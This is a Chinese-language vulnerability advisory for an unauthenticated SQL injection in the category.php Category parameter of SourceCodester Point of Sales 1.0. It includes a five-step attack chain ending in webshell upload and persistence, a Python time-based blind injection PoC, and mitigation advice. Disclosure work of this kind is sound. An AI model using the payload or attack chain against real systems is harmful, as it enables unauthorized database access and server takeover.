CVE-2025-12293 SourceCodester Point of Sales 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12293

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Point of Sales 1.0

漏洞概述

CVE-2025-12293是SourceCodester Point of Sales 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于category.php文件中，由于对Category参数的用户输入未进行充分的输入验证和SQL语句预编译处理，攻击者可以通过构造恶意的SQL语句片段实现数据库注入攻击。成功利用此漏洞可导致未授权访问数据库敏感信息，包括用户凭证、交易记录等机密数据，同时可能进行数据篡改或删除，对业务系统造成严重影响。该漏洞CVSS评分7.3，属于高危级别，攻击复杂度低，无需认证即可远程利用，对系统机密性、完整性和可用性均产生一定影响。

技术细节

该SQL注入漏洞位于SourceCodester Point of Sales 1.0的/category.php文件中的Category参数处理逻辑。攻击者可通过HTTP请求向该参数注入恶意构造的SQL语句片段。由于应用程序未对用户输入进行严格的过滤和参数化查询预处理，攻击者注入的SQL代码将被数据库引擎执行。攻击者可利用UNION SELECT、布尔盲注、时间盲注等技术提取数据库中的敏感信息，包括管理员账号密码、用户个人信息、交易数据等。在某些配置下，攻击者甚至可能通过OUTFILE或INTO DUMPFILE等语句写入恶意文件，实现操作系统层面的远程代码执行。整个攻击过程可通过自动化工具远程发起，无需任何认证凭证。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标站点使用SourceCodester Point of Sales 1.0，定位到存在漏洞的category.php文件

STEP 2

步骤2

探测阶段：发送标准化SQL测试 payload（如单引号'）验证漏洞存在，观察错误响应或行为差异

STEP 3

步骤3

注入攻击：利用UNION注入或布尔/时间盲注技术，构造恶意SQL语句提取数据库版本、用户、密码哈希等敏感信息

STEP 4

步骤4

权限提升：如数据库用户具有FILE权限，利用INTO OUTFILE写入WebShell或利用LOAD_FILE读取系统配置文件

STEP 5

步骤5

持久化控制：通过写入后门或修改数据库用户表获取持久化访问权限，完成对系统的完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-12293 SQL Injection PoC
# Target: SourceCodester Point of Sales 1.0
# Vulnerability: SQL Injection in /category.php via Category parameter

target_url = "http://target.com/category.php"

# Blind SQL Injection payload to extract database version
payload = "1' AND (SELECT 7753 FROM (SELECT(SLEEP(5)))x)-- -"

params = {
    "Category": payload
}

print(f"[*] Sending payload to {target_url}")
print(f"[*] Payload: {payload}")

try:
    response = requests.get(target_url, params=params, timeout=30)
    elapsed = response.elapsed.total_seconds()
    
    if elapsed >= 5:
        print(f"[+] SQL Injection confirmed! Response time: {elapsed}s")
        print("[+] Database is vulnerable to time-based blind SQL injection")
    else:
        print(f"[-] No obvious SQL injection detected. Response time: {elapsed}s")
except requests.exceptions.Timeout:
    print("[+] SQL Injection confirmed via timeout")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

SourceCodester Point of Sales 1.0

防御指南

临时缓解措施

立即对category.php文件中的Category参数处理逻辑进行修复，采用参数化查询方式处理数据库操作。对用户输入实施严格的输入验证，限制输入字符类型和长度。同时建议临时使用WAF规则对相关参数进行过滤，待官方发布补丁后尽快升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12293
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12293
3 Details https://www.cvedetails.com/cve/CVE-2025-12293/
4 VulDB https://vuldb.com/cve/CVE-2025-12293
5 Link https://github.com/J-Fy2767/CVE/issues/4
6 Link https://vuldb.com/?ctiid.329961
7 Link https://vuldb.com/?id.329961
8 Link https://vuldb.com/?submit.675852
9 Link https://www.sourcecodester.com/